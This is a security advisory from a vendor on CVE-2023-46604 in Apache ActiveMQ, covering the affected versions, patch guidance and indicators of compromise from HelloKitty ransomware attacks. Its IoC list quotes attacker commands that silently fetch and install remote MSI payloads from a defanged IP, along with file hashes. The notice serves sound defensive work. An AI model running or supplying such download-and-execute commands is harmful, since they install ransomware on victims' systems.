overview

This week, researchers from Rapid7 have issued a warning regarding the suspected exploitation of a critical vulnerability, tracked as CVE-2023-46604, in Apache ActiveMQ. Apache ActiveMQ is an open-source message broker software, serving as a message-oriented middleware platform. It facilitates communication and data exchange between various applications.  

Rapid7's investigation revealed that threat actors (HelloKitty) attempted to exploit CVE-2023-46604 to deploy HelloKitty ransomware in two separate customer environments. The ransomware deployment was observed in cases where organizations were running outdated versions of Apache ActiveMQ. 

The vulnerability in question is a remote code execution flaw affecting Apache ActiveMQ, allowing remote attackers to execute arbitrary shell commands by manipulating serialized class types in the OpenWire protocol. Apache released updated versions of ActiveMQ to address this vulnerability. Impacted versions of Apache ActiveMQ include: 

  • Apache ActiveMQ 5.18.0 before 5.18.3 
  • Apache ActiveMQ 5.17.0 before 5.17.6 
  • Apache ActiveMQ 5.16.0 before 5.16.7 
  • Apache ActiveMQ before 5.15.16 
  • Apache ActiveMQ  Legacy OpenWire Module 5.18.0 before 5.18.3 
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6 
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7 
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16 

Since the disclosure of the vulnerability, a proof-of-concept (PoC) exploit code and technical details have become publicly available. The Shadowserver Foundation reported that as of October 30, approximately 7,249 Apache ActiveMQ instances were exposed to the internet, with around 3,329 of them vulnerable to the flaw. Organizations are strongly advised to update to fixed versions of Apache ActiveMQ as soon as possible.  

 

 

avertium's recommendationS

  • Apache recommends that users upgrade to version(s):  
    • 5.15.16
    • 5.16.7 
    • 5.17.6 
    • 5.18.3 
  • Information regarding updates can be found in Apache’s release notes.  
  • You may also find helpful tip on improving the security of ActiveMQ instances here 

 

 

INDICATORS OF COMPROMISE (IoCs)

Rapid7's security team looked into CVE-2023-46604 and examined the exploit code available to the public. During their testing, they found that the activemq.log file recorded a single line that confirmed the successful use of CVE-2023-46604. In this specific case, the individual responsible (in this instance, a researcher) operated from the IP address 192[.]168[.]86[.]35 and targeted TCP port 61616. It's important to note that the level of detail in the log entries can be different, depending on the logging settings, which can be adjusted as needed. 

Rapid7 has also listed other IoCs found below: 

  • hxxp://172.245.16[.]125/m2.png 
  • hxxp://172.245.16[.]125/m4.png 

Files dropped and executed via the msiexec command: 

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png" 
  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png" 

Hashes that are part of the two MSI packages downloaded from the domain 172[.]245[.]16[.]125: 

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0 
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 
  • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5 

 

 

How Avertium is Protecting Our CUSTOMERS

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills. See every threat in your attack surface, every device, every entry point, and every vulnerability. Our Attack Surface Management services include:  
    • Risk Assessments 
    • Pen Testing and Social Engineering  
    • Infrastructure Architecture and Integration  
    • Zero Trust Network Architecture 
    • Vulnerability Management 
  • Fusion MXDR is the first MDR offering that fuse together all aspects of security operations into a living, breathing, threat-resistant XDR solution. By fusing insights from threat intelligence, security assessments, and vulnerability management into our MDR approach, Fusion MXDR offers a more informed, robust, and cost-effective approach to cybersecurity – one that is greater than the sum of its parts. 
  • Note: We highly value your feedback. Kindly spare a moment to complete our feedback form, allowing us to enhance our services for our valued customers. 

 

 

SUPPORTING DOCUMENTATION

oss-security - CVE-2023-46604: Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a remote code execution (RCE) attack (openwall.com) 

Suspected exploitation of Apache ActiveMQ flaw CVE-2023-46604 to install HelloKitty ransomware (securityaffairs.com) 

Suspected Exploitation of Apache ActiveMQ CVE-2023-46604 | Rapid7 Blog 

Threat Actors Target Apache ActiveMQ Flaw | Decipher (duo.com) 

ActiveMQ (apache.org) 

ActiveMQ (apache.org) 
Chat With One of Our Experts



Flash Notice Critical Vulnerability Apache Vulnerability Apache ActiveMQ Hello Kitty Ransomware Blog